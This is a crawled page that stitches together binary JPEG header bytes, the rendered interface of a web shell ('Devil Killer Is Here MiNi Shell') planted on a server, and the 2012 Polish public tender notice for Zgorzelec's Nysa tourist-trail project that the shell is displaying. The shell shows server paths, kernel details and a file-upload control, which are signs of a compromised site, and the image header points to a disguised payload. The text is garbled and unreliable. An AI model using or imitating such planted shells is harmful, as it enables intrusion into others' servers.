JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120208/38166-N-2012.html

<p class="kh_header"><b>Zgorzelec: Zaprojektowanie i wykonanie robót budowlanych w ramach projektu pn. Przygoda z Nysą - zagospodarowanie turystyczne pogranicza polsko-niemieckiego</b><br>
<b>Numer ogłoszenia: 38166 - 2012; data zamieszczenia: 08.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zgorzelec , ul. Kościuszki 70, 59-900 Zgorzelec, woj. dolnośląskie, tel. 075 7721435.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gmina.zgorzelec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaprojektowanie i wykonanie robót budowlanych w ramach projektu pn. Przygoda z Nysą - zagospodarowanie turystyczne pogranicza polsko-niemieckiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zaprojektowanie i wykonanie robót budowlanych w ramach realizacji projektu pn. Przygoda z Nysą - zagospodarowanie turystyczne pogranicza polsko-niemieckiego.
Przedmiot zamówienia obejmuje wykonanie dokumentacji projektowej wraz z niezbędnymi pozwoleniami i uzgodnieniami oraz roboty budowlane dotyczące traktów pieszo-rowerowych i szlaków turystycznych w Gminie Zgorzelec, wraz z niezbędnymi remontami dróg oraz pracami infrastrukturalnymi, wzdłuż Nysy Łużyckiej stanowiących bazę do kompleksowego zagospodarowania turystycznego.
Prace projektowe i budowlano-wykonawcze przebiegać będą w pobliżu miejscowości:
Koźlice (Lasowice); Koźlice; Osiek Łużycki; Radomierzyce, Jędrzychowice
Niniejsze zamówienie obejmuje:
I. Kompleksowe opracowanie dokumentacji projektowej dla wykonania robót budowlanych na podstawie załączonego PF-U: Opracowanie dokumentacji projektowej w zakresie koniecznym do wykonania zadania, uzyskanie wszystkich wymaganych opinii, uzgodnień, zatwierdzeń i pozwoleń, w tym pozwolenia na budowę lub uzyskanie przez Wykonawcę braku sprzeciwu do zgłoszenia wykonania robót.
Zakres opracowania dokumentacji powinien obejmować:
1) Projekt budowlany (wykonany w zakresie i formie niezbędnej do uzyskania pozwolenia na budowę lub zgłoszenia wraz z kompletem uzgodnień i opracowań wymaganych na tym etapie), który obejmie m.in.:
a) Uzgodnienie z Zamawiającym koncepcji funkcjonalno-przestrzennej i jej pisemne zaakceptowanie przez Inwestora;
b) Projekt zagospodarowania terenu;
c) Projekt architektoniczno - budowlany;
d) Projekt gospodarki zielenią oraz projekt małej  architektury;
e) Opinia Zespołu Uzgodnień Dokumentacji (jeżeli wymagane);
f) Projekt konstrukcyjny;
2) Specyfikacje techniczne wykonania i odbioru robót, obejmujące cały zakres przedmiotu zamówienia;
3)  Projekt wykonawczy;
4) Opracowanie bądź zakup mapy turystycznej gminy do publikacji na tablicach turystycznych.
5) Projekt tablic turystycznych dużych, tablic małych, tablic obiektowych, tablic szkolnych (zdjęcia, treść w dwóch językach (polski-niemiecki)). Do zadań Wykonawcy będzie opracowanie treści informacyjnej (opisy turystyczne. dwujęzyczne-polski i niemiecki) i graficznej (zdjęcia, rysunki, mapy) tablic oraz wszelkie tłumaczenia. Każdy projekt tablicy musi zostać zaakceptowany przez Zamawiającego. 
6) Dodatkowo (opcjonalnie jeżeli poniższe zadania będą wymagane) m.in.:
a) Uzyskanie map do celów projektowych;
b) Decyzja lokalizacji inwestycji celu publicznego
c) Uzyskanie decyzji o warunkach zabudowy lub  wypis z Miejscowego Planu Zagospodarowania Przestrzennego
d) Pomoc Zamawiającemu w pozyskiwaniu na etapie projektowania zgód, umów użytkowania wieloletniego działek nie będących własnością Gminy.
e) Wykonanie Raportów o oddziaływaniu na środowisko dla całości inwestycji;  
f) Decyzje o wycięciu drzew, jeśli będzie to konieczne (nie dotyczy terenów objętych Naturą 2000)  
g) Pozwolenia wodno - prawne na podstawie operatów wodno - prawnych, sporządzonych przez osobę posiadającą odpowiednie uprawnienia (uprawniony hydrolog) i przygotowanie merytoryczne.
h) Badania gruntowe -geotechniczne; dokumentacja geologiczno-inżynierska;
i) Uzgodnienia ekspertyz dla odstępstw od warunków technicznych;
j) Uzgodnienia odstępstw przewidzianych w warunkach technicznych i uzyskanie zgody na odstępstwa od warunków technicznych;
k) Uzyskanie w imieniu Zamawiającego pozwolenia na budowę;
l) Zgłoszenie rozpoczęcia robót w imieniu Zamawiającego.
II. Wykonanie robót budowlanych, infrastruktura techniczno-wypoczynkowa:
a) Prace znakarskie i wyposażeniowe na szlakach turystycznych zgodnie z Koncepcją przebiegu szlaków turystycznych w Gminie Zgorzelec (patrz zał. 3 do PF-U)
-  rewitalizacja (odnowienie) istniejących szlaków pieszych i rowerowych - ok 80 km;
-  oznakowanie nowych szlaków rowerowych - ok 120 km; 
-  wytyczenie i oznakowanie znakami szlaku wodnego (kajakowego) po Nysie - ok 20 km;
-  oznakowanie dojazdów do szlaku wodnego (kajakowego) - 1 komplet;
-  wyposażenie szlaku wodnego (kajakowego) na Nysie wg projektu; 
-  wykonanie i zamontowanie na szlaku wodnym i terenie gminy 6 dużych i 16 małych tablic turystycznych z przebiegiem szlaków;
- wykonanie i zamontowanie 29 tablic obiektowych przy obiektach krajoznawczych;
- wykonanie i zamontowanie na szlaku wodnym i innych szlakach 10 miejsc odpoczynku z ławką, 10 miejsc odpoczynku ze stołem i 5 wiat turystycznych;
-  wykonanie 5 tablic szkolnych;
b) Remont dróg leśnych i zmiana na trakt pieszo-rowerowy:
- droga leśna ze Stalagu VIIIA do rzeki (działki am1: 313, 238, 237 Koźlice  - ok.2,5 km - równanie, warstwa 15 cm kruszywa łamanego stabilizowanego mechanicznie   o uziarnieniu 5/31,5, warstwa 3 cm grysu kamiennego 2/5mm. Trakt pieszo-rowerowy  o szerokości 2,5m  - wyłączony z ruchu samochodowego. 
- remont drogi polnej na działce am1 238 Koźlice w stronę granicy z miastem Zgorzelec. ok1km - równanie, warstwa 15 cm kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 5/31,5, warstwa 3 cm grysu kamiennego 2/5mm. Trakt pieszo-rowerowy o szerokości 2,5m  - wyłączony z ruchu samochodowego  kontynuacja drogi rowerowej ze Zgorzelca.
c) Remont dróg leśnych i polnych pod ruch pojazdów:
- polnej na działce 526 a.m.2 Osiek Łużycki  - jako drogi dojazdowej z Osieka Łużyckiego do traktu pieszo rowerowego. ok. 1900 m - równanie, warstwa 30 cm kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 5/31,5. Droga szutrowa o szerokości 2,5m.
d) budowa/remont/przebudowa traktu pieszo-rowerowego, o charakterze rekreacyjno-edukacyjnym wzdłuż Nysy Łużyckiej z Radomierzyc do Koźlic (Lasowic) (ok 15 km) - szutrowa 2 - 2,5m szerokości - równanie, geotkanina o wytrzymałości wzdłuż i w poprzek mim. 35 kN/mb,  warstwa 15 cm kruszywa łamanego stabilizowanego mechanicznie o uziarnieniu 5/31,5 , warstwa 3 cm grysu kamiennego 2/5mm. Trasa biegnie wzdłuż wałów nad Nysą Łużycką - teren łąk, możliwe miejsca gdzie będzie trzeba wykonać więcej podsypki piaskiem (tereny bardziej wilgotne, a nawet niewielkie przepusty rurowe - działka 199/3 a.m.1 Kożlice). Naprawa mostku ceglanego (droga z Osieka - działka 290/1, a.m. 2 Osiek) polegająca na wymianie umocnień wlotu i wylotu mostku poprzez wykonanie betonowych ścianek czołowych.  
e) prace ziemne pod infrastrukturę techniczno-wypoczynkową i informacyjną na trakcie pieszo - rowerowym z Radomierzyc do Jędrzychowic, związane ze szlakiem wodnym po Nysie. Jako, że trakt prowadzony jest równolegle do szlaku wodnego (kajakowego) - zakładane jest przygotowanie placów i dojść pod miejsca dobijania i odbijania na szlaku wodnym. Miejsca te będą jednocześnie miejscami odpoczynku dla turystów poruszających się po trakcie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju  zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.62-2, 45.22.11.00-3, 71.32.00.00-7, 31.52.32.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 20.000 złotych (słownie : dwadzieścia tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Warunkiem spełnienia jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonym przepisami art. 22 ust. 1 ustawy Pzp - zał. nr 2 (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców oświadczenie składa pełnomocnik upoważniony do reprezentowania ich w postępowaniu)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Opis sposobu dokonywania oceny spełniania tego warunku (w przypadku  wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku):
- Wykonawca winien wykazać, że  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył co najmniej jedną inwestycję budowlaną polegającą na budowie/przebudowie/remoncie drogi lub ścieżki rowerowej o długości co najmniej 3000 m; 
- Wykonawca winien wykazać, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:
a) wykonał co najmniej jedną usługę polegającą na znakowaniu szlaków turystycznych (rowerowych, wodnych /kajakowych/, pieszych) zgodnie z Instrukcją PTTK o długości nie mniejszej niż 100 km.
b) wykonał co najmniej jedno zamówienie polegające na wykonaniu/ dostawie drewnianej infrastruktury turystycznej (tablice turystyczne, wiaty, miejsca odpoczynku turystów) na kwotę min. 70.000,00 zł. (netto). 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót i usług sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ oraz dokumenty potwierdzające, że roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone a usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Warunkiem spełnienia jest złożenie oświadczenia o spełnieniu warunków udziału w postępowaniu określonym przepisami art. 22 ust. 1 ustawy Pzp - zał. nr 2 (W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców oświadczenie składa pełnomocnik upoważniony do reprezentowania ich w postępowaniu)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Opis sposobu dokonywania oceny spełniania tego warunku:
a) w zakresie zespołu projektowego - dysponowanie co najmniej jedną osobą z uprawnieniami do projektowania w specjalności konstrukcyjno-budowlanej oraz jedną osobą z uprawnieniami do projektowania w specjalności drogowej.
b) w zakresie zespołu realizującego zamówienie - dysponowanie co najmniej jedną osobą do pełnienia funkcji kierownika budowy posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w branży drogowej 
- wraz z podaniem informacji na temat jej/ich kwalifikacji zawodowych oraz informacji o dysponowaniu tymi osobami oraz złożenie oświadczenia, że osoby, które będą kierować robotami budowlanymi w poszczególnych branżach, posiadają wymagane uprawnienia, są wpisane do Izby Samorządu Zawodowego a zaświadczenia o wpisie do tej Izby są ważne na dzień otwarcia ofert - poprzez wypełnienie i podpisanie załącznika nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia przez Wykonawcę warunku zgodnie z formułą /spełnia/- /nie spełnia/. Opis sposobu dokonywania oceny spełniania tego warunku:
posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 300 tys. zł.  
W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz Oferty, sporządzony na podstawie wzoru stanowiącego załącznik nr 1 do niniejszej SIWZ;
2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego;
3. dowód wniesienia wadium w przypadku wniesienia wadium w pieniądzu - do oferty należy dołączyć kopię polecenia przelewu natomiast w przypadku złożenia wadium w innej formie kopię oryginału dokumentu potwierdzającego wniesienie wadium;
4. Wypełnione zestawienie rzeczowo-finansowe na podstawie wzoru stanowiącego załącznik nr 6 do niniejszej SIWZ;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość wprowadzenia zmian umowy przy zachowaniu ceny umowy, może wystąpić w następujących przypadkach:
1. w przypadku zmian organizacyjnych stron np.: zmiana reprezentacji, adresu siedziby Firmy, zmiany kierownika robót lub inspektora nadzoru;
2. w przypadku zmiany kluczowych specjalistów, przedstawionych w ofercie, jedynie za uprzednią pisemną zgodą Zamawiającego, akceptującego nowego kluczowego specjalistę.
2.1 Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów  w następujących przypadkach:
2.1.1 śmierci, choroby lub zdarzeń losowych kluczowego specjalisty,
2.1.2 nie wywiązywania się kluczowego specjalisty z obowiązków wynikających z umowy.
2.1.3 Jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.),
2.2 Zamawiający może zażądać od Wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że kluczowy  specjalista nie wykonuje swoich obowiązków wynikających z umowy. Wykonawca obowiązany jest zmienić  kluczowego specjalistę zgodnie z żądaniem Zamawiającego w terminie wskazanym we wniosku Zamawiającego. W przypadku zmiany kluczowego specjalisty  nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
3. w zakresie częściowych terminów i terminu końcowego 
- w przypadku błędów lub braków projektowych (z winy projektanta lub nie) jest konieczna zmiana technologii wykonania robót budowlanych, 
- gdy wykonanie zamówień dodatkowych  spowoduje uzasadnione przedłużenie terminu realizacji zamówienia,  
- z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć z pewnością w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
- z powodu złych warunków atmosferycznych uniemożliwiających realizację zamówienia potwierdzonych przez Inspektora Nadzoru wpisem do Dziennika Budowy,
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
- jeśli dotrzymanie terminu wskazanego pierwotnie okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wykonawca, w szczególności wniesienia przez Zamawiającego istotnej zmiany do projektu, na podstawie którego Wykonawca wykonuje przedmiot umowy lub wprowadzenia robót zamiennych;
4. Zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu robót, bądź wprowadzenia nowego podwykonawcy;
5. W zakresie płatności:
- zmianie mogą ulec terminy płatności ujęte w harmonogramie rzeczowo-finansowym stanowiącym załącznik nr 2 do Umowy - jeżeli nastąpiła zmiana terminu częściowego lub końcowego. 
- zmianie mogą ulec podziały płatności częściowych jeśli ich wprowadzenie będzie korzystne dla realizacji zamówienia poprzez np. technologiczne uzasadnienie zmiany, usprawnienie realizacji zamówienia, potwierdzone przez Inspektora Nadzoru, Kierownika budowy i zaakceptowane przez Zamawiającego.
6 Zamawiający przewiduje możliwość zmiany umowy, w przypadku gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gmina.zgorzelec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zgorzelec ul. Kościuszki 70, 59-900 Zgorzelec (pok. nr 9).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2012 godzina 10:00, miejsce: Urząd Gminy Zgorzelec ul. Kościuszki 70, 59-900 Zgorzelec (Biuro Obsługi Klienta).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany jest ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Współpracy Transgranicznej Polska-Saksonia 2007-2013.</p>
